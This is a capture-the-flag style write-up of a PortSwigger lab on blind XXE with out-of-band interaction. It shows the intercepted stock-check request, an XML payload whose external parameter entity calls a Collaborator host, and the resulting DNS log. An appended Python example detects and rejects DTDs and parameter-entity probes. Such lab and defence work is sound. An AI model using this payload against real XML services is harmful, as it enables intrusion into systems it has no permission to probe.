
PortSwigger: Blind XXE with out-of-band interaction 1

Blind XXE with out-of-band interaction via XML parameter entities

Solution

Check stock

POST /product/stock HTTP/2
Host: 0a4b00f4048c1e3781ed70fd001f0070.web-security-academy.net
Cookie: session=ILSFJbp4sO14jFEZ2meU1Ux6LVM2WBbv
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a4b00f4048c1e3781ed70fd001f0070.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 107
Origin: https://0a4b00f4048c1e3781ed70fd001f0070.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

Create payload

Old payload:
<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>
---
New payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [ <!ENTITY % hack SYSTEM 'http://jczc8ugl97ycu627432hegnmldr4fz3o.oastify.com'>]>
<stockCheck><productId>%hack;</productId><storeId>1</storeId></stockCheck>

Check for the DNS/HTTP request in the Collaborator tab

The Collaborator server received a DNS lookup of type A for the domain name jCZC8uGL97yCU627432heGNMLDr4fZ3o.oASTifY.COM.  The lookup was received from IP address 192.178.65.27:51360 at 2026-Jan-12 13:41:19.584 UTC.

Solved
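Added example, not part of the lab writeup or of PortSwigger's code: a server-side pre-parse check in Python that refuses any DTD in the stock-check body, flags an external parameter entity declaration like the one in the payload above so it can be logged, and only then reads the two fields with the standard-library parser. The sample bodies and the oob-placeholder.example host are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples: the lab's legitimate body and a parameter-entity probe with a placeholder host.
BENIGN_REQUEST = (b'<?xml version="1.0" encoding="UTF-8"?>'
                  b'<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>')
OOB_REQUEST = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
               b'<!DOCTYPE stockCheck [ <!ENTITY % hack SYSTEM "http://oob-placeholder.example">]>\n'
               b'<stockCheck><productId>%hack;</productId><storeId>1</storeId></stockCheck>')
BARE_DTD_REQUEST = b'<!DOCTYPE stockCheck><stockCheck><productId>2</productId><storeId>3</storeId></stockCheck>'

# The legitimate client never sends a DTD, so any DOCTYPE is out of policy.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
# A parameter entity (% name) with an external identifier is the out-of-band XXE indicator.
PARAM_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+%\s*(?P<name>\S+)\s+(?:SYSTEM|PUBLIC)\s+(?P<q>['\"])(?P<uri>[^'\"]*)(?P=q)",
    re.IGNORECASE,
)


def inspect_stock_check(body: bytes) -> dict:
    """Pre-parse policy check; returns a verdict a WAF rule or application log can record."""
    match = PARAM_ENTITY_RE.search(body)
    if match:
        return {"ok": False, "reason": "external parameter entity",
                "uri": match.group("uri").decode("ascii", "replace")}
    if DOCTYPE_RE.search(body):
        return {"ok": False, "reason": "DTD not allowed", "uri": None}
    return {"ok": True, "reason": None, "uri": None}


def parse_stock_check(body: bytes) -> tuple:
    """Reject any DTD first, then read the two integer fields from the stockCheck element."""
    verdict = inspect_stock_check(body)
    if not verdict["ok"]:
        raise ValueError(verdict["reason"])
    root = ET.fromstring(body)  # expat does not fetch external entities, and no DTD reaches it anyway
    if root.tag != "stockCheck":
        raise ValueError("unexpected root element")
    return int(root.findtext("productId")), int(root.findtext("storeId"))


def is_rejected(body: bytes) -> bool:
    """True when the body is refused before any field is read."""
    try:
        parse_stock_check(body)
    except ValueError:
        return True
    return False
```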